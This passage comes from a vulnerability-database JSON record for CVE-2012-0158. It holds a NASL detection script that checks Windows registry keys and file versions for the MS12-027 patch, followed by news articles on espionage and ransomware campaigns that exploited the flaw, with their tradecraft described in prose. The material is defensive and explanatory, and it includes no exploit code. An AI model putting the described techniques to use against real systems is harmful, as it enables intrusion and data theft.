arbitrary code\n within the context of the application.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft SQL Server 2008\n\n - Microsoft Visual Basic 6.0\n\n - Microsoft Commerce Server 2009\n\n - Microsoft SQL Server 2005 Service Pack 4\n\n - Microsoft SQL Server 2000 Service Pack 4\n\n - Microsoft Visual FoxPro 9.0 Service Pack 2\n\n - Microsoft Visual FoxPro 8.0 Service Pack 1\n\n - Microsoft Commerce Server 2007 Service Pack 2\n\n - Microsoft Commerce Server 2002 Service Pack 4\n\n - Microsoft Office 2010 Service Pack 1 and prior\n\n - Microsoft Office 2007 Service Pack 3 and prior\n\n - Microsoft Office 2003 Service Pack 3 and prior\n\n - Microsoft SQL Server 2000 Analysis Services Service Pack 4\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(!sysVer){\n exit(0);\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\nif(officeVer && officeVer =~ \"^1[124]\\.\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:20", "description": "[](<http://2.bp.blogspot.com/-M8cMLC5NtdI/Ua4XqeyaL9I/AAAAAAAAV9g/soz4j7rFh4E/s1600/Surveillance+malware+targets+350+high+profile+victims+in+40+countries.png>)\n\nA global cyber espionage campaign affecting over 350 high profile victims in 40 countries, appears to be the work of [Chinese hackers](<http://thehackernews.com/2013/02/chinese-government-targets-uyghur-group.html>) using a Surveillance malware called \"**_NetTraveler_**\".\n\n \n\n\nKaspersky Lab\u2019s team of experts published a new research [report](<http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf>) about NetTraveler, which is a family of malicious programs used by APT cyber crooks. The main targets of the campaign, which has been running since 2004, are Tibetan/Uyghur activists, government institutions, contractors and embassies, as well as the oil and gas industry.\n\n[Spear phishing](<http://thehackernews.com/2011/01/spear-phishing-latest-ploy-to-steal.html>) emails were used to trick targets into opening [malicious documents](<http://thehackernews.com/2012/01/print-of-one-malicious-document-can.html>). The attackers are using two vulnerabilities in Microsoft Office including Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158, which have been patched but remain highly-popular on the hacking scene, and have run NetTraveler alongside other malware. \n \nC&C servers are used to install additional malware on infected machines and exfiltrate stolen data and more than 22 gigabytes amount of stolen data stored on NetTraveler\u2019s C&C servers.\n\n \n\n\nAccording to researchers, the largest number of samples we observed were created between 2010 and 2013. The largest number of infections has been spotted in Mongolia, India and Russia, also in China, South Korea, Germany, the US, Canada, the UK, Austria, Japan, Iran, Pakistan, Spain and Australia.\n\n \n\n\nResearchers believe that hackers team behind this attack are 50 individuals, most of whom speak Chinese natively but also have a decent level of English.\n\n \n\n\nSix victims were also hit by the [Red October](<http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html>) attackers, whom Kaspersky had profiled last year. Those victims included a military contractor in Russia and an embassy in Iran.\n", "cvss3": {}, "published": "2013-06-04T05:39:00", "type": "thn", "title": "Surveillance malware targets 350 high profile victims in 40 countries", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-06-04T16:39:05", "id": "THN:D9114576EA7861D9D8859B9EF23814E4", "href": "http://thehackernews.com/2013/06/surveillance-malware-targets-350-high.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:13", "description": "None\n", "cvss3": {}, "published": "2013-10-27T05:37:00", "type": "thn", "title": "Terminator RAT became more sophisticated in recent APT attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-10-27T16:41:46", "id": "THN:DC21EBE0272DEA3B043A3EB0A5B5B1DA", "href": "http://thehackernews.com/2013/10/terminator-rat-became-more.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:42", "description": "[](<https://2.bp.blogspot.com/-UbDg_2GB7PM/UvnrUMicegI/AAAAAAAAaEM/KiTNTDtBQro/s1600/Valentine-day-malware-hacking.jpg>)\n\n_Valentine's Day__ _\\- a day of hearts, Chocolates, Flowers and Celebrations when people express their emotions to their loved ones and most of us send E-cards, purchase special gifts with the help of various Online Shop Sites and many other tantrums making them feel special.\n\n \n\n\nWhile you are busy in Googling ideal gifts for your loved ones, the Cyber thieves are also busy in taking advantage of such events by spreading various [malware](<https://thehackernews.com/search/label/Malware>), phishing campaigns and fraud schemes as these days come out to be a goldmine for the cyber criminals.\n\n \n\n\n_Online Shopping Scams_ are popular among Cyber criminals as it is the easiest way for hackers to steal money in easy and untraceable ways.\n\n \n\n\nSecurity Researchers at Anti virus firm - _Trend Micro_ [discovered](<http://blog.trendmicro.com/trendlabs-security-intelligence/breaking-up-with-valentines-day-online-threats/>) various Valentine's Day threats which are common at such occasion i.e. A flower-delivery service and it appears to be a normal promotional e-mail, but the links actually lead to various survey scams.\n\n \n\n\nThe Malware threats also arrive during this season of love. The researchers recently found a new attack targeting Canadian users looking for a Romantic Dinner Giveaway. The email appears to be about a special Valentine Dinner, and has an attachment which is actually a malicious _.RTF_ file (_detected as TROJ_ARTIEF. VDY_), using a known buffer overflow vulnerability (_[CVE-2012-0158](<https://technet.microsoft.com/en-us/security/bulletin/ms12-027>)_) in Windows Common Controls, allows remote code execution to drop a backdoor (BKDR_INJECT.VDY) onto the affected system.\n\n[](<https://2.bp.blogspot.com/-9TVw2Nf0xD0/UvnqlXFjJGI/AAAAAAAAaEE/uNtMfYZkQ6w/s1600/Valentine-day-malware-hacking.png>)\n\nThis Valentine's Day, with the popularity of Android phones and iPhones, it seems practical to impress your beloved by sending e-cards using various Valentine's Day Apps, but you never realize that despite sending E-cards, you are also inflicting an [Android](<https://thehackernews.com/search/label/Android>) malware on your beloveds which could be worse to your relation.\n\n \n\n\nThe security researchers from _Bitdefender_ recently released a report, noted how such Valentine's Day apps could demand undue permissions, that could violate users\u2019 privacy, rack up users\u2019 phone bills, and even possibly cause identity theft.\n\n \n\n\nThe researchers have detected various malware-inflicted apps, one of which is \u2018**Valentine\u2019s Day 2014 Wallpaper**.\u2019 The app records user\u2019s location and his browsing history in the process without having any justification for asking permissions.\n\n \n\n\nAnother is \u2018**Valentine's Day Frames**\u2019, the app that reads the user\u2019s contacts list, which is logically an odd request because the app is only intended to adorn user\u2019s romantic photographs with Valentine's Day themed photo frames. _So what\u2019s the use of reading your contact list for this app?_\n\n \n\n\nOne more, \u2018**Love Letters for Chat, Status**\u2019 which allows you to share love quotes, letters, and even poems to your dearest friends, but the app is capable to send emails, make phone calls, change audio settings, and even modify calendar events without your permission. So gifting this to your beloved may cause an end to you sweet relation.\n\n \n\n\nSeasonal deals and offers are common place, so its users own duty to spot what\u2019s malicious and what\u2019s not. Following are some tips every Internet user must follow:\n\n * Do not to open emails and click links in wild from unknown sources.\n * Do not run attached files that come from unknown sources, especially these days.\n * The biggest bargains aren\u2019t always the biggest stealing. If an offer sounds too good to be true, it probably is, but if you are making purchases online, then prefer a reputed shopping site and type the address of the store in the browser, rather than going through any links that have been sent to you.\n * Has an effective security solution installed in your system that is capable of detecting both known and new malware strains.\n\nDon\u2019t spread malware... Spread love :) Stay safe! Stay tuned to The Hacker News.\n", "cvss3": {}, "published": "2014-02-10T22:26:00", "type": "thn", "title": "Beware! Cyber Criminals may spoil your Valentine's Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-02-11T09:26:36", "id": "THN:28D18D871A6086136DFA7958D9C516E0", "href": "https://thehackernews.com/2014/02/beware-cyber-criminals-may-spoil-your.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:09", "description": "[](<https://3.bp.blogspot.com/-8CkpwB8JPN8/U999kcWKl_I/AAAAAAAAcqQ/EdVV47WNr10/s1600/Poweliks-persistent-malware-windows-registry.jpg>)\n\nMalware is nothing but a malicious files which is stored on an infected computer system in order to damage the system or steal sensitive data from it or perform other malicious activities. But security researchers have uncovered a new and sophisticated piece of malware that infects systems and steals data without installing any file onto the targeted system.\n\n \n\n\nResearchers dubbed this [persistent malware](<https://thehackernews.com/search/label/Advanced%20Persistent%20Threat>) as **Poweliks**, which resides in the computer registry only and is therefore not easily detectable as other typical malware that installs files on the affected system which can be scanned by antivirus or anti-malware Software.\n\n \n\n\nAccording to [Paul Rascagneres](<https://twitter.com/r00tbsd>), Senior Threat Researcher, Malware analyst at GData software, due to the malware\u2019s subsequent and step-after-step execution of code, the feature set was similar to a stacking principles of Matryoshka Doll approach.\n\n \n\n\nPaul has made a number of name ripping malware and bots to uncover and undermine cyber crimes. He won last years' Pwnie Award at _Black Hat Las Vegas_ for tearing through the infrastructure of Chinese hacker group APT1.\n\n \n\n\nIn order to infect a system, the [malware](<https://thehackernews.com/search/label/Malware>) spreads via emails through a malicious Microsoft Word document and after that it creates an encoded autostart registry key and to remain undetectable it keeps the registry key hidden, Rascagneres says.\n\n \n\n\nThe malware then creates and executes shellcode, along with a payload Windows binary that tried to connect to \u2018_hard coded IP addresses_\u2019 in an effort to receive further commands from the attacker.\n\n> \"_All activities are stored in the registry. No file is ever created,\"_ Rascagneres said in a [blog post](<https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html>). _\"So, attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a machine] even after a system re-boot._\u201d\n\n> _\"To prevent attacks like this, antivirus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer's email inbox.\"_\n\nTo create an autostart mechanism, the malware creates a registry, which is a non-ASCII character key, as Windows Regedit cannot read or open the non-ASCII key entry.\n\n \n\n\n**CAPABILITIES OF POWELIKS MALWARE**\n\nPoweliks malware is quite dangerous and can perform a number of malicious activities. The malware can: \n\n * Download any payload\n * Install spyware on the infected computer to harvest users\u2019 personal information or business documents\n * Install banking Trojans in order to steal money\n * Install any other type of malicious software that can fulfil the needs of the attackers\n * used in botnet structures\n * generate immense revenue through ad-fraud\n\n_The non-ASCII trick is a tool which the Microsoft created and uses in order to hide its source code from being copied or tampered with, but this feature was later cracked by a security researcher. _\n\n[](<https://1.bp.blogspot.com/-wwHjFi73t9w/U998OfeEGVI/AAAAAAAAcqI/-WWnTsYObIA/s1600/poweliks_regedit_.png>)\n\nThe security and malware researchers on the _KernelMode.info_ forum last month analysed a sample which is dropped by a Microsoft Word document that exploited the vulnerability described in CVE-2012-0158, which affected Microsoft products including Microsoft Office. \n\n \n\n\nThe malware authors distributed the malware as an attachment of fake Canada Post and/or USPS email allegedly holding tracking information.\n\n> \"_This trick prevents a lot of tools from processing this malicious entry at all and it could generate a lot of trouble for incident response teams during the analysis. The mechanism can be used to start any program on the infected system and this makes it very powerful,_\" Rascagneres said.\n", "cvss3": {}, "published": "2014-08-04T01:37:00", "type": "thn", "title": "POWELIKS \u2014 A Persistent Windows Malware Without Any Installer File", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-08-04T12:49:05", "id": "THN:82833AE00002BB0F41BEF5FD8972FAFB", "href": "https://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:38:31", "description": "[](<https://thehackernews.com/images/-NZsRCoMmOn8/XpWH1q07tzI/AAAAAAAAAN8/WwbAeoGUIyUyD1p1LTfUXvZao-TclGL-QCLcBGAsYHQ/s728-e100/ransomware-healthcare.jpg>)\n\nAs hospitals around the world are struggling to respond to the coronavirus crisis, cybercriminals\u2014with no conscience and empathy\u2014are continuously targeting healthcare organizations, research facilities, and other governmental organizations with ransomware and malicious information stealers. \n \nThe new research, published by Palo Alto Networks and shared with The Hacker News, [confirmed](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>) that \"the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are in the front lines and responding to the pandemic on a daily basis.\" \n \nWhile the security firm didn't name the latest victims, it said a Canadian government healthcare organization and a Canadian medical research university both suffered ransomware attacks, as criminal groups seek to exploit the crisis for financial gain. \n \nThe attacks were detected between March 24 and March 26 and were initiated as part of the coronavirus-themed phishing campaigns that have become widespread in recent months. \n \nPalo Alto Networks' disclosure comes as The U.S. Department of Health and Human Services ([HHS](<https://www.reuters.com/article/us-healthcare-coronavirus-usa-cyberattac/cyberattack-hits-u-s-health-department-amid-coronavirus-crisis-idUSKBN21320V>)), biotechnology firm [10x Genomics](<https://www.bloomberg.com/news/articles/2020-04-01/hackers-without-conscience-demand-ransom-from-health-providers>), [Brno University Hospital](<https://www.novinky.cz/internet-a-pc/bezpecnost/clanek/fakultni-nemocnice-v-brne-je-cilem-pocitacoveho-utoku-potvrdil-c-40316531>) in the Czech Republic, and [Hammersmith Medicines Research](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>) have been hit by [cyberattacks](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112>) in the past few weeks. \n \n\n\n## Delivering Ransomware by Exploiting CVE-2012-0158\n\n \nAccording to the researchers, the campaign began with malicious emails sent from a spoofed address mimicking the World Health Organization (noreply@who[.]int) that were sent to a number of individuals associated with the healthcare organization that's actively involved in COVID-19 response efforts. \n \nThe email lures contained a rich text format (RTF) document named \"_20200323-sitrep-63-covid-19.doc_,\" which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in Microsoft's ListView / TreeView ActiveX controls in MSCOMCTL.OCX library. \n \n\n\n[](<https://thehackernews.com/images/-tDmarl5Chgc/XpWFNQpROzI/AAAAAAAAANw/Xe1Femp0QBIB0YfJayeZi_qwxyY3ho_bwCLcBGAsYHQ/s728-e100/phishing-malware-email.jpg>)\n\n \n\"It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates,\" Palo Alto Networks researchers noted. \n \n\"It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss.\" \n \nUpon execution, the ransomware binary contacts the command-and-control (C2) server to download an image that serves as the main ransomware infection notification on the victim's device, and subsequently transmits the host details to create a custom key to encrypt the files on the system's desktop with a \".locked20\" extension. \n \nAside from receiving the key, the infected host uses an HTTP Post request to send the decryption key, encrypted using AES, to the C2 server. \n \nPalo Alto Networks ascertained that the ransomware strain was EDA2 based on the code structure of the binary and the host-based and network-based behaviors of the ransomware. EDA2 and Hidden Tear are considered one of the [first open-source ransomware](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-open-source-ransomwar-based-on-hidden-tear-and-eda2-may-target-businesses/>) that were created for educational purposes but have since been abused by hackers to pursue their own interests. \n \n\n\n## A Spike in Ransomware Incidents\n\n \nThe ransomware attacks are a consequence of an [increase in other cyberattacks](<https://thehackernews.com/2020/03/covid-19-coronavirus-hacker-malware.html>) related to the pandemic. They have included a rash of [phishing emails](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) that attempt to use the crisis to persuade people to click on links that download malware or ransomware onto their computers. \n \nFurthermore, Check Point Research's Brand Phishing Report for Q1 2020 observed a jump in mobile phishing due to people spending more time on their phones for information related to the outbreak and for work. Attackers were found imitating popular services such as Netflix, Airbnb, and Chase Bank to steal login credentials. \n \nWith hospitals under time constraints and pressure due to the ongoing pandemic, hackers are counting on the organizations to pay ransoms to recover access to critical systems and prevent disruption to patient care. \n \nA report released by [RisKIQ](<https://www.riskiq.com/wp-content/uploads/2020/04/Ransomware-in-Health-Sector-Intelligence-Brief-RiskIQ.pdf>) last week found that ransomware attacks on medical facilities were up 35% between 2016 and 2019, with the average ransom demand being $59,000 across 127 incidents. The cybersecurity firm stated that hackers also favored small hospitals and healthcare centers for reasons ranging from lean security support to increased likelihood of heeding to ransom demands. \n \nThe spike in ransomware attacks against the medical sector has prompted [Interpol](<https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware>) to issue a warning about the threat to member countries. \n \n\"Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage, preventing them from accessing vital files and systems until a ransom is paid,\" the agency said. \n \nTo protect the systems from such attacks, Interpol cautioned organizations to watch out for phishing attempts, encrypt sensitive data, and take periodic data backups, aside from storing them offline or on a different network to thwart cybercriminals.\n", "cvss3": {}, "published": "2020-04-14T10:00:00", "type": "thn", "title": "Hackers Targeting Critical Healthcare Facilities With Ransomware During Coronavirus Pandemic", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2020-04-15T10:08:57", "id": "THN:8007E43933D6EA07FB6E74E9DCC5FA70", "href": "https://thehackernews.com/2020/04/ransomware-hospitals-coronavirus.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:21", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj5bP38ayXt3WUgoCPr1MM_l_XoOSBHW7RA85wFIe5_jGUGg0_CPoMB25tHssF2g1NTVNsj0F2qTcIlaA9SIKLzy-XkwB-7qGzBB-3b6FhDSPjeXTrHmyiLjIpcZz6mePl003SOEAoGsbC2fAngnHZakExhsEZpZxfRjQ8MN1OF28_ifsCXJ_67ZMpu/s728-e100/china.jpg>)\n\nA previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed **Aoqin Dragon** has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013.\n\n\"Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,\" SentinelOne researcher Joey Chen [said](<https://s1.ai/aoqin>) in a report shared with The Hacker News. \"Other techniques the attacker has been observed using include DLL hijacking, [Themida-packed files](<https://blog.malwarebytes.com/detections/trojan-malpack-themida/>), and DNS tunneling to evade post-compromise detection.\"\n\nThe group is said to have some level of tactical association with another threat actor known as [Naikon](<https://thehackernews.com/2022/05/chinese-override-panda-hackers.html>) (aka Override Panda), with the campaigns primarily directed against targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam.\n\nInfections chains mounted by Aoqin Dragon have banked on Asia-Pacific political affairs and pornographic-themed document lures as well as USB shortcut techniques to trigger the deployment of one of two backdoors: Mongall and a modified version of the open-source [Heyoka project](<https://heyoka.sourceforge.net/>).\n\nUp until 2015, this involved leveraging exploits for old and unpatched security vulnerabilities ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/cve-2012-0158>) and [CVE-2010-3333](<https://nvd.nist.gov/vuln/detail/cve-2010-3333>)) in the decoy documents that were designed to entice targets into opening them. Over the years, the threat actor has evolved its approach to employ executable droppers masquerading as antivirus software from McAfee and Bkav to deploy the implant and connect to a remote server.\n\n\"Although executable files with fake file icons have been in use by a variety of actors, it remains an effective tool especially for APT targets,\" Chen explained. \"Combined with 'interesting' email content and a catchy file name, users can be socially engineered into clicking on the file.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEimnjl-Gy2EJZ3R9vL99RHfhTsboA8UgDxcZBYmox7pOu3fMPSz7g-s9V77BTnIPyDOmFhUmLi0H8ShxY2pR5AVbXiR8QVzdZC5W_y4QgJPO3Xi6A1MrLaxYBkoDdgTXDFMqB59bRnoPj5h_yAGHVLz7yetxauPq9_A5prtDDtFbSaI5UeNpTvw-6bP/s728-e100/labs.jpg>)\n\nThat said, Aoqin Dragon's newest initial access vector of choice since 2018 has been its use of a fake removable device shortcut file (.LNK), which, when clicked, runs an executable (\"RemovableDisc.exe\") masked with the icon for the popular note-taking app Evernote but is engineered to function as a loader for two different payloads.\n\nOne of the components in the infection chain is a spreader that copies all malicious files to other removable devices and the second module is an encrypted backdoor that injects itself into [rundll32](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32>)'s memory, a [native Windows process](<https://redcanary.com/threat-detection-report/techniques/rundll32/>) used to load and run DLL files.\n\nKnown to be [used](<https://www.welivesecurity.com/wp-content/uploads/2013/12/Advanced-Persistent-Threats.pdf>) since at least 2013, Mongall (\"HJ-client.dll\") is described as a not-so \"particularly feature rich\" implant but one that packs enough features to create a remote shell and upload and download arbitrary files to and from the attacker-control server.\n\nAlso used by the adversary is a reworked variant of Heyoka (\"srvdll.dll\"), a proof-of-concept (PoC) exfiltration tool \"which uses spoofed DNS requests to create a bidirectional tunnel.\" The modified Heyoka backdoor is more powerful, equipped with capabilities to create, delete, and search for files, create and terminate processes, and gather process information on a compromised host.\n\n\"Aoqin Dragon is an active cyber espionage group that has been operating for nearly a decade,\" Chen said, adding, \"it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and stay longer in their target network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-06-09T11:00:00", "type": "thn", "title": "A Decade-Long Chinese Espionage Campaign Targets Southeast Asia and Australia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2022-06-09T16:31:58", "id": "THN:25E1C5E39F109FC80A69CCF02734A606", "href": "https://thehackernews.com/2022/06/a-decade-long-chinese-espionage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:15", "description": "[](<http://3.bp.blogspot.com/-u4tWthaiHas/UkWq-HnhGBI/AAAAAAAAXy0/QcH2jC5FGbA/s1600/Chinese+APT+Espionage+campaign,+dubbed+'Icefog'+targeted+Military+contractors+and+Governments.png>)\n\n**Kaspersky Lab** has identified another [Chinese APT campaign](<http://thehackernews.com/search/label/APT1>), dubbed \u2018**Icefog**\u2019, who targeted Governmental institutions, Military contractors, maritime / shipbuilding groups, telecom operators, industrial and high technology companies and mass media.\n\n \n\n\nThe Hacking group behind the attack who carry out surgical [hit and run operations](<http://thehackernews.com/search/label/cyber%20espionage>), is an [advanced persistent threat](<http://thehackernews.com/search/label/Chinese%20Hackers>) (APT) group, used a backdoor dubbed Icefog that worked across Windows and [Mac OS X](<http://thehackernews.com/search/label/Mac%20OS>) to gain access to systems.\n\n\"_The Mac OS X backdoor currently remains largely undetected by security solutions and has managed to infect several hundred victims worldwide_,\" [the report](<http://www.securelist.com/en/downloads/vlpdfs/icefog.pdf>) (PDF) said. \n \n\n\nThis China-based [campaign](<http://thehackernews.com/2013/02/mandiant-revealed-chinese-apt1-cyber.html>) is almost two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a [spear-phishing](<http://thehackernews.com/search/label/Spear%20Phishing>) email, or are lured to a compromised website and infected with [malware](<http://thehackernews.com/search/label/Malware>).\n\nThe attackers embed exploits for several known [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) (CVE-2012-1856 and CVE-2012-0158) into Microsoft Word and Excel documents.\n\n \n\n\nOnce a computer has been compromised, the hackers upload [malicious tools](<http://thehackernews.com/search/label/hacking%20tool>) and backdoors. They look for email account credentials, sensitive documents and passwords to other systems.\n\n[](<http://2.bp.blogspot.com/-XiMXWdrJEd0/UkWrQ-NuzjI/AAAAAAAAXy8/Otpp4n6YeSY/s1600/Spear+phishing+mail.png>)\n\n \n\n\n\"_We observed many victims in several other countries, including Taiwan, Hong Kong, China, USA, Australia, Canada, UK, Italy, Germany, Austria, Singapore, Belarus and Malaysia_,\" the research team said.\n\n \n\n\nThere is no concrete evidence to confirm this was a nation-state sponsored operation, but based on where the stolen data were transferred to, Kaspersky wrote the attackers are assumed to be in China, South Korea and Japan.\n\n[](<http://4.bp.blogspot.com/-ZFm4K6kLoyI/UkWsMlnzypI/AAAAAAAAXzI/bJ9suAFvclM/s1600/statistics.png>)\n\nIn total, Kaspersky Lab observed more than 4,000 uniquely infected IPs and several hundred victims. They are now in contact with the targeted organizations as well as government entities in order to help them identify and eradicate the infections.\n", "cvss3": {}, "published": "2013-09-27T05:05:00", "type": "thn", "title": "Chinese APT Espionage campaign, dubbed 'Icefog' targeted Military contractors and Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1856", "CVE-2012-0158"], "modified": "2013-09-27T16:12:43", "id": 